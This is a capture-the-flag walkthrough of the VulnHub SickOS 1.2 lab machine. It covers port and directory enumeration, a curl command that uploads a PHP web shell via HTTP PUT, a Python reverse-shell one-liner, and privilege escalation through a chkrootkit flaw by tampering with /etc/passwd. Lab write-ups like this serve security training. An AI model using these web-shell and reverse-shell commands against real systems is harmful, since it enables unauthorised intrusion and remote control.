VulnHub – SickOS 1.2 Walkthrough
Introduction
This is a Linux box that involved exploiting the PUT http method to upload a PHP script through which a reverse shell can be obtained, and then using a known vulnerability in the chkrootkit program to escalate to root.
Enumeration
The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, and using the following flags:
- -sC to run default scripts
- -sV to enumerate applications versions
- -Pn to skip the host discovery phase, as some hosts will not respond to ping requests
- -oA to save the output in all formats available
Enumerating Port HTTP
When accessing the web server, the following page is displayed:
The source code does not have anything useful
The next step is to run a scan to find hidden files or directories using Wfuzz, with the following flags:
- -w to specify the word list to use
- –hc to exclude certain response codes
- specifying the URL to scan, using FUZZ to indicate which part to fuzz
It looks like the “/test” entry takes to a lighttpd 1.4.28 webserver
After searching on SearchSploit it looks like no known exploits are available
The other entries are forbidden:
When checking the available methods through curl, the PUT method is available. This could be used to upload a reverse shell.
curl -v -X OPTIONS 10.10.10.131/test
Exploiting file upload via PUT request
Using curl to upload a PHP file containing the following code which will allow us to remotely execute code:
curl -v -X PUT -d '<?php echo system($_REQUEST['cmd']);?>' http://10.10.131/test/stef.php
When accessing the file, this allows to remotely execute commands through the “cmd” parameter:
The next step is to set up a Netcat listener, which will catch our reverse shell when it is executed by the victim host, using the following flags:
- -l to listen for incoming connections
- -v for verbose output
- -n to skip the DNS lookup
- -p to specify the port to listen on
Executing a python reverse shell through the cmd parameter:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.131",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
Received a callback and established a reverse shell connection to the host:
Privilege Escalation
When inspecting the cron jobs on the machine, “chkrootkit” stands out:
Chkrootkit is a common Unix based program intended to help system administrators check their system for known rootkits.
Using SearchSploit to find known vulnerabilities in chkrootkit
Checking the chkroot version on the box – it matches the one in the exploit
Having a look at the exploit, it looks like the slapper function is expecting a file (in file_port) and if left empty, chkrootkit will simply execute as root all files with a name of “update”, as no quotation marks were specified in this variable’s path:
Below it lists the steps required to exploit this vulnerability:
Created a quick bash script to change the permissions of the /etc/passwd file
A new root user can be created by adding a new line to the /etc/passwd file. The steps required are the following:
- Reading a few lines from the /etc/passwd file to verify the format
- Generating a new password hash using openssl
- Adding a new line to the /etc/passwd file, replacing the “x” with the previously created password hash
This could not be achieved with the sed command as the current user did not have permission to write a temporary file in the /etc folder. In this scenario I decided to instead replace the user’s root password.
This can be done using awk or echo, as shown below:
Logging in using SSH as the newly created user:
Conclusion
This was a really fun box, although the initial exploitation process wasn’t that hard it is definitely not something you see every day. What I liked most was the vulnerability in the chkrootkit tool, as this rootkit detection tool is something you see quite often in Linux and not something you’d expect to carry such a critical vulnerability.